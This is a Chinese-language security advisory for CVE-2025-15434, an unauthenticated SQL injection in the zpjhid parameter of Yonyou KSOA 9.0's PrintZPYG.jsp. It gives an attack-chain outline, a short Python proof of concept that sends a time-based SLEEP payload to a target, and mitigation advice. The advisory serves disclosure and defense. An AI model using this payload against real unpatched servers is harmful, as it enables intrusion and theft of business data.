用友KSOA 9.0 PrintZPYG.jsp SQL注入漏洞 (CVE-2025-15434)

漏洞信息

漏洞编号

CVE-2025-15434

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

用友KSOA 9.0

漏洞概述

用友KSOA 9.0存在严重的SQL注入漏洞，攻击者可通过构造恶意SQL语句获取数据库敏感信息。该漏洞存在于/kp/PrintZPYG.jsp文件中的zpjhid参数，由于未对用户输入进行充分的过滤和参数化处理，导致攻击者可以在HTTP请求中注入任意SQL代码。漏洞CVSS评分为7.3，属于高危级别，攻击复杂度低且无需认证即可利用。攻击者可通过远程网络请求直接利用此漏洞，可能导致企业数据库中的财务数据、客户信息、业务数据等敏感信息泄露。该漏洞已于2026年1月2日公开披露，厂商用友公司早期收到通知但未做出任何回应，目前尚无官方修复版本。

技术细节

漏洞存在于用友KSOA 9.0的/kp/PrintZPYG.jsp页面，具体受影响的参数为zpjhid。攻击者通过在zpjhid参数中注入SQL语句，可以执行任意数据库查询操作。由于应用程序未对用户输入进行严格的输入验证和参数化查询，恶意SQL代码会被直接拼接到数据库查询语句中执行。攻击者可能利用UNION SELECT、堆叠查询等技术提取数据库中的敏感信息，包括用户凭证、财务数据、业务数据等。该漏洞属于经典的SQL注入类型，攻击者可通过自动化工具（如SQLMap）快速发现和利用此漏洞。成功利用此漏洞可能导致企业核心业务数据泄露，严重威胁企业信息安全。

攻击链分析

STEP 1

1

侦察阶段：攻击者扫描目标服务器，识别运行用友KSOA 9.0的Web应用

STEP 2

2

定位目标：访问/kp/PrintZPYG.jsp页面，确认漏洞接口存在

STEP 3

3

构造恶意请求：在zpjhid参数中注入SQL注入payload

STEP 4

4

验证漏洞：使用布尔盲注或时间盲注技术确认漏洞存在

STEP 5

5

数据提取：利用UNION注入或堆叠查询提取数据库敏感信息

STEP 6

6

横向移动：利用获取的数据库信息进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15434 PoC - Yonyou KSOA 9.0 SQL Injection
# Target: /kp/PrintZPYG.jsp
# Parameter: zpjhid

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in Yonyou KSOA 9.0
    target_url: Base URL of the vulnerable application
    payload: SQL injection payload
    """
    params = {
        'zpjhid': payload
    }
    
    try:
        response = requests.get(f'{target_url}/kp/PrintZPYG.jsp', params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f'Error: {e}')
        return None

def basic_detection(target_url):
    """Basic detection using time-based blind SQL injection"""
    # Normal request
    normal_response = exploit_sqli(target_url, '1')
    
    # Payload with sleep to detect vulnerability
    # Using MySQL SLEEP() function
    payload = "1' AND SLEEP(5)-- -"
    
    print(f'Testing target: {target_url}')
    print(f'Payload: {payload}')
    
    response = exploit_sqli(target_url, payload)
    
    if response:
        print('Vulnerability may be present - check response manually')
    
    return response

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve_2025_15434.py <target_url>')
        print('Example: python cve_2025_15434.py http://vulnerable-server.com')
        sys.exit(1)
    
    target = sys.argv[1]
    basic_detection(target)

影响范围

用友KSOA 9.0

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1) 在Web应用防火墙或IPS设备上添加针对/kp/PrintZPYG.jsp路径的访问控制规则，限制对该页面的访问；2) 临时关闭或限制该功能模块的使用；3) 加强网络层访问控制，仅允许受信任的IP地址访问相关接口；4) 部署实时数据库监控和告警机制，及时发现异常查询行为；5) 定期备份数据库，确保数据安全。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15434
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15434
3 Details https://www.cvedetails.com/cve/CVE-2025-15434/
4 VulDB https://vuldb.com/cve/CVE-2025-15434
5 Link https://github.com/cly-yuxiu/CVE/issues/1
6 Link https://vuldb.com/?ctiid.339361
7 Link https://vuldb.com/?id.339361
8 Link https://vuldb.com/?submit.721490